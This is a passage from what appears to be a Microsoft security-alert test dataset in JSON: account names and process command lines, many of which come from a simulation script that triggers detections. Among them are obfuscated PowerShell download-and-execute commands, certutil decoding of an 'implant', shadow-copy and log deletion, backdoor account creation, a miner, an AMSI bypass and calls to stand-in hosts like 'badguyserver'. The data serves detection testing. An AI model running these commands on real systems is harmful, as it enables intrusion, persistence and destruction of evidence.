",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\"],\"CommandLine\":[\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\".\\\\reg not /domain:everything that /sid:shines is /krbtgt:golden !\",\"cmd /c \\\"systeminfo && systeminfo\\\"\",\".\\\\rundll32 /C 42424.exe\",\"42424.exe\",\".\\\\rundll32 /C c:\\\\users\\\\MSTICAdmin\\\\42424.exe\",\".\\\\rundll32 /C 1234.exe\",\"1234.exe\",\".\\\\rundll32 /C c:\\\\users\\\\MSTICAdmin\\\\1234.exe\",\".\\\\rundll32 /C reg.exe\",\"reg.exe\",\".\\\\reg.exe add \\\\hkcu\\\\software\\\\microsoft\\\\some\\\\key\\\\Run /v abadvalue\",\"c:\\\\Diagnostics\\\\UserTmp\\\\tsetup.1.exe C:\\\\Users\\\\MSTICAdmin\\\\AppData\\\\Local\\\\Temp\\\\2\\\\is-01DD7.tmp\\\\tsetup.1.0.14.tmp\\\" /SL5=\\\"$250276,19992586,423424,C:\\\\Users\\\\MSTICAdmin\\\\Downloads\\\\tsetup.1.0.14.exe\",\".\\\\rundll32.exe /C mshtml,RunHTMLApplication javascript:alert(tada!)\",\".\\\\netsh.exe \\\"in (*.exe) do start # artificial commandline solely for purposes of triggering test\\\"\",\".\\\\cmd /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&powershell Set-ExecutionPolicy RemoteSigned&echo [S]&cd&echo [E]\\\"\",\".\\\\cmd /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&powershell Enable-WSManCredSSP =2013Role Server -force&echo [S]&cd&echo [E]\\\"\",\".\\\\cmd /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&powershell winrm set winrm/config/service/Auth @{Kerberos=003D\\\"true\\\"}&echo [S]&cd&echo [E]\\\"\",\".\\\\cmd /c \\\"cd /d \\\"C:\\\\ProgramData\\\"© \\\\\\\\[REDACTED]\\\\c$\\\\users\\\\[REDACTED]\\\\Documents\\\\\\\"Password Change Dates.docx\\\"\",\".\\\\cmd /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&c:\\\\windows\\\\system32\\\\inetsrv\\\\appcmd set config \\\"Default Web Site/\\\" /section:httplogging /dontLog:true&echo [S]&cd&echo [E]\\\"\",\".\\\\cmd /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&del C:\\\\inetpub\\\\logs\\\\logFiles\\\\W3SVC1\\\\*.log /q&echo [S]&cd&echo [E]\\\"\",\"c:\\\\Diagnostics\\\\UserTmp\\\\perfc.dat \",\"c:\\\\Diagnostics\\\\UserTmp\\\\sdopfjiowtbkjfnbeioruj.exe \",\"c:\\\\Diagnostics\\\\UserTmp\\\\doubleextension.pdf.exe \",\"vssadmin delete shadows /all /quiet\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"C:\\\\Windows\\\\system32\\\\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}\",\"cmd.exe /c c:\\\\Diagnostics\\\\WindowsSimulateDetections.bat c:\\\\Diagnostics\\\\UserTmp\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"cmd /c echo Any questions about the commands executed here then please contact one of\",\"cmd /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; marcook@microsoft.com; dotanp@microsoft.com; liengli@microsoft.com\",\"net user adm1nistrator Bob_testing /add\",\"C:\\\\Windows\\\\system32\\\\net1 user adm1nistrator Bob_testing /add\",\"net share TestShare=c:\\\\testshare /Grant:Users,Read\",\"C:\\\\Windows\\\\system32\\\\net1 share TestShare=c:\\\\testshare /Grant:Users,Read\",\"dism /online /enable-feature /featurename:File-Services /NoRestart\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"net use q: \\\\\\\\MSTICAlertsWin1\\\\TestShare Bob_testing /User:adm1nistrator\",\"C:\\\\Windows\\\\TEMP\\\\CC563BBE-DE32-44D3-8E35-F3FC78E72E40\\\\dismhost.exe {D57BA872-53C0-424D-80AE-E49112D1CF04}\",\"C:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe\",\"C:\\\\Windows\\\\winsxs\\\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.2602_none_7ee6020e2207416d\\\\TiWorker.exe -Embedding\",\"net use q: /delete\",\"net share TestShare /delete\",\"C:\\\\Windows\\\\system32\\\\net1 share TestShare /delete\",\"net user adm1nistrator /delete\",\"C:\\\\Windows\\\\system32\\\\net1 user adm1nistrator /delete\",\".\\\\regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll\",\"C:\\\\Windows\\\\system32\\\\svchost.exe -k wsappx\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\suchost.exe -a cryptonight -o bcn -u bond007.01 -p x -t 4\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"cmd /c \\\"echo TVqQAAMAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> delme.b64\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"cmd /c \\\"echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> delme.b64\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\powershell -command {(n`EW-obJ`E`cT N`et`.W`eb`C`li`en`t).DownloadFile('https://blah/png','google.png')}\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\powershell.exe -c \\\"$a = 'Download'+'String'+\\\"(('ht'+'tp://paste'+ 'bin/'+'raw/'+'pqCwEm17'))\\\";$b = '(New-Object' + ' Net.WebClient)';'$b.$a' | Out-File .\\\\evil.ps1;\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\powershell -c {IEX (New-Object Net.WebClient).DownloadString(('ht'+(\\\"{2}{0}{1}\\\"-f ':/','/paste','tp')+'bin/'+'raw/'+(\\\"{1}{0}\\\"-f'Em17','pqCw')));}\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"cmd /c \\\".\\\\pOWErS^H^ElL^.eX^e^ -^ExEc^Ut^IoNpOliCy BYpa^sS i^mPOr^T-^M^oDuLE biTsTr^ANSFe^R;^S^tar^t-bITSTRanS^fER -^SOURCE^ 'http://somedomain/best-kitten-names-1.jpg' ^-d^EStIN^At^IOn ^'C:\\\\Users\\\\$env:UserName\\\\AppData\\\\Local\\\\Temp\\\\kittens1.jpg';\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"cmd /c \\\".\\\\n^e^t u^se^r\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\powershell -enc JAB0ACAAPQAgACcAZABpAHIAJwA7AA0ACgAmACAAKAAnAEkAbgB2AG8AawBlACcAKwAnAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAnACkAIAAkAHQA\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"cmd /c \\\"echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> blah.ps1\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"cmd /c \\\"echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> blah.ps1\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"certutil -decode delme.b64 implant.exe\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"implant.exe k111\",\"implant.exe 81ed03caf6901e444c72ac67d192fb9c\",\"implant.exe -b -t -m\",\"cmd /c \\\"echo Invoke-Expression Get-Process; Invoke-WebRequest -Uri http://badguyserver/pwnme\\\" \",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\powershell -Noninteractive -Noprofile -Command \\\"Invoke-Expression Get-Process; Invoke-WebRequest -Uri http://badguyserver/pwnme\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\powershell Invoke-Shellcode.ps1\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\powershell Invoke-ReverseDnsLookup.ps1\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\powershell -command \\\"(New-Object Net.WebClient).DownloadString(('ht'+'tp://pasteb' + 'bin/'+'raw/'+'pqCwEm17'));\\\"\",\"net localgroup Administrators\",\"C:\\\\Windows\\\\system32\\\\net1 localgroup Administrators\",\"whoami\",\"hostname\",\"netstat -an\",\"net user Bob1 /domain\",\"C:\\\\Windows\\\\system32\\\\net1 user Bob1 /domain\",\"net user BobX /domain\",\"C:\\\\Windows\\\\system32\\\\net1 user BobX /domain\",\"net group \\\"Domain Admins\\\" /domain\",\"C:\\\\Windows\\\\system32\\\\net1 group \\\"Domain Admins\\\" /domain\",\".\\\\rUnDlL32 /C ShEll32Control_RanDLL.dll\",\".\\\\reg query add mscfile\\\\\\\\\\\\\\\\open\",\".\\\\reg add Image File Execution Options sethc.exe\",\".\\\\ftp -s:C:\\\\RECYCLER\\\\xxppyy.exe\",\".\\\\dubrute.exe\",\".\\\\nlbrute.exe\",\".\\\\reg add \\\"HKLM\\\\system\\\\CurrentControlSet\\\\Control\\\\Terminal Server\\\" /v \\\"fDenyTSConnections\\\" /t REG_DWORD /d 0x1 /f\",\".\\\\reg add \\\"HKLM\\\\system\\\\CurrentControlSet\\\\Control\\\\Terminal Server\\\" /v \\\"fDenyTSConnections\\\" /t REG_DWORD /d 0x0 /f\",\"net use v: \\\\\\\\tsclient\\\\c\",\"net v: /delete\",\"C:\\\\Windows\\\\system32\\\\net1 v: /delete\",\"cmd /c C:\\\\Windows\\\\System32\\\\mshta.exe vbscript:CreateObject(\\\"Wscript.Shell\\\").Run(\\\".\\\\powershell.exe -c \\\"\\\"$x=$((gp HKLM:Software\\\\Microsoft\\\\Windows\\\\CurrentVersion Certificate).Certificate);.\\\\powershell -E $y\\\"\\\"\\\",0,True)(window.close)\",\".\\\\netsh advfirewall firewall add rule name=RbtGskQ action=allow program=c:\\\\users\\\\Bob\\\\appdata\\\\Roaming\\\\RbtGskQ\\\\RbtGskQ.exe\",\".\\\\reg add HKLM\\\\KEY_LOCAL_MACHINE\\\\...securityproviders\\\\wdigest uselogoncredential /t 1\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"c:\\\\Windows\\\\System32\\\\cmd.exe /c net user\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"cmd /c c:\\\\Diagnostics\\\\UserTmp\\\\scrsave.scr\\\"\",\"c:\\\\Diagnostics\\\\UserTmp\\\\svchost.exe \",\"c:\\\\Diagnostics\\\\UserTmp\\\\smss.exe \",\"c:\\\\Windows\\\\System32\\\\svchost.exe -k malicious\",\"cmd.exe /c echo createobject\\\"msxml2.xmlhttp\\\") \",\"ASC_Alerttest_662jfi039n.exe -foo\",\".\\\\powershell.exe -command [ref].assembly.gettype('http://system.management.automation.amsiutils').getfield('amsiinitfailed','nonpublic,static').setvalue($null,$true)\\\\\\\"\",\"netsh start capture=yes IPv4.Address=1.2.3.4 tracefile=C:\\\\\\\\Users\\\\\\\\user\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\bzzzzzz.txt\",\".\\\\wuauclt.exe /C \\\"c:\\\\windows\\\\softwaredistribution\\\\cscript.exe\\\"\",\"c:\\\\windows\\\\softwaredistribution\\\\cscript.exe\",\"C:\\\\Windows\\\\system32\\\\net1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo 